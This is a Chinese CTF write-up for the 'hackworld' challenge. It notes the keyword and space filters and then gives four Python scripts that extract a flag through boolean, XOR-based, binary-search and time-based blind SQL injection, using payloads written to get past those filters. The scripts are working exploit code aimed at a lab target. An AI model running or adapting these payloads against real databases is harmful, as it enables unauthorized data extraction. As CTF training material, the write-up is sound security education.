hackworld(盲注,这里可以使用时间盲注或布尔盲注)
根据一波手动测试,知道过滤了 &、||、and、or、for、空格等等; 测试的时候,除了被检验出来的注入,还存在 "Error Occured When Fetch Result." 和 "Hello, glzjin wants a girlfriend." 两种页面(其实还有一种直接 bool(false) 的页面),所以尝试布尔注入: -1=(23<231) 和 -1=(23>231)
的确存在布尔报错,好,上脚本:
自己写的极慢的垃圾脚本:
import requests
import re
# Boolean-based blind probe: one POST per (position, candidate byte).
# The page body is the oracle -- the "girlfriend" banner appears only when
# the equality inside the injected if() held.  The loop never breaks on a
# hit, so every candidate is tried for every position (hence "slow").
s = ''
url = "http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php"
for pos in range(1, 16):
    for code in range(31, 127, 1):  # printable ASCII window 31..127
        # Comparison-only payload: no spaces or logical keywords, because
        # the target filters them (see the notes above the script).
        payload = "-1=(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" % (pos, code)
        sess = requests.session()  # fresh session for every candidate, as in the original
        probe = sess.get(url)
        if probe:  # requests.Response is truthy on a non-error status
            reply = sess.post(url, data={"id": payload})
            body = reply.text
            if "Hello, glzjin wants a girlfriend." in body:
                print(chr(code))
                s += chr(code)
            else:
                print("no")
print("flag is:" + s)
异或:
import requests
import re
# XOR variant of the same boolean-blind probe: 1^(if(cond,0,1)) evaluates
# to 1 only when cond holds, so the page again leaks one bit per request.
s = ''
url = "http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php"
TEMPLATE = "1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))"
MARKER = "Hello, glzjin wants a girlfriend."

for position in range(1, 16):
    for byte in range(31, 127, 1):  # printable ASCII window 31..127
        client = requests.session()
        if not client.get(url):  # nothing is done for this candidate if the warm-up GET failed
            continue
        answer = client.post(url, data={"id": TEMPLATE % (position, byte)})
        if MARKER in answer.text:
            print(chr(byte))
            s += chr(byte)
        else:
            print("no")
print("flag is:" + s)
放个大佬的二分查找脚本:
#!/usr/bin/python
#-*-coding:utf-8 -*-
import requests
import re
def flag_get(start, f, url):
    """Equality oracle: is byte `start` (1-based) of the flag equal to ASCII `f`?

    Returns 1 when the response body contains 'Hello' (the true branch of
    the injected if()), otherwise 0.  The `url` argument is ignored: it is
    overwritten by the literal below, so callers cannot redirect the probe.
    """
    probe = ('1^(if((ascii(substr((select(flag)from(flag)),'
             + str(start) + ',1))=' + str(f) + '),0,1))')
    url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php'
    reply = requests.post(url, {'id': probe})
    return 1 if 'Hello' in reply.text else 0
def flag_find(start, f, url):
    """Ordering oracle: is byte `start` (1-based) of the flag greater than ASCII `f`?

    Same request/response handling as flag_get, but the injected comparison
    is '>' instead of '=', which is what lets the caller binary-search the
    value.  Returns 1 on 'Hello' in the body, else 0.  As in flag_get, the
    `url` argument is discarded in favour of the hard-coded literal.
    """
    probe = ('1^(if((ascii(substr((select(flag)from(flag)),'
             + str(start) + ',1))>' + str(f) + '),0,1))')
    url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php'
    reply = requests.post(url, {'id': probe})
    return 1 if 'Hello' in reply.text else 0
if __name__ == '__main__':
    # Driver: binary-search each flag byte with flag_find (the ">" oracle),
    # then confirm the exact value with flag_get (the "=" oracle).
    # NOTE: `url` is passed to both helpers, but each overwrites it with its
    # own literal, so changing it here has no effect.
    url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php'
    flag_kouhao=125  # ASCII '}' -- the closing brace marks the end of the flag
    flag=''
    num=1 #position (1-based) to start extracting from
    while 1:
        start=32 #lower bound of the ASCII search window (decimal)
        last=126 #upper bound of the ASCII search window (decimal)
        mid=int((start+last)/2)
        while 1:
            # Re-checked on every narrowing step (one extra request each time):
            # if this position is already '}', finish and exit.
            if(flag_get(num,flag_kouhao,url)):
                flag=flag+'}'
                print('flag is :'+flag)
                exit(1)
            print('strat is '+str(start))
            print(' mid is '+str(mid))
            print('last is '+str(last))
            print('****************************************')
            # Move whichever bound the ">" oracle rules out, then stop
            # narrowing once the window is small enough for a linear scan.
            if(flag_find(num,mid,url)):
                start=mid
                mid=int((start+last)/2)
                if ((last-start)<5):
                    break
            else:
                last=mid
                mid=int((start+last)/2)
                if ((last-start)<5):
                    break
        print(start)
        print(last)
        print('****************************************')
        # Linear scan of the remaining window with the "=" oracle.
        for i in range(start,last+1):
            print(i)
            if(flag_get(num,i,url)):
                f=chr(i)
                flag=flag+f
                print('****************************************')
                print(' num is '+str(num))
                print('char is '+f)
                print('flag is '+flag)
                print('****************************************')
                break
        # If no candidate matched, nothing is appended and this position is
        # skipped silently (`f` keeps its value from the previous position).
        num=num+1
    print(flag)  # unreachable: the outer loop is only ever left via exit(1)
时间盲注:
大佬脚本:
import requests
def six_six_six(url):
    """Time-based blind extraction: grow `flag` one character at a time.

    Each candidate prefix is wrapped in sleep(...) and the only signal used
    is whether requests.post() raises within the 1 s timeout -- a raise is
    treated as "the prefix matched".  Because the handler catches every
    exception, not just a timeout, transient network errors are misread as
    hits.  Stops after a '}' is accepted and prints progress to stdout.
    """
    alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789{}_-'
    template = "sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))"
    flag = ''
    while True:
        for ch in alphabet:
            payload = {'id': template.format(i=flag + ch)}
            print(payload)
            try:
                requests.post(url=url, data=payload, timeout=1)
            except BaseException:  # same scope as a bare except
                flag += ch
                print('[*]%s' % flag)
                break
        if ch == '}':
            break
    print('[+]%s' % flag)
url = 'http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php'
# Module-level side effect: the extraction runs as soon as the file executes.
six_six_six(url=url)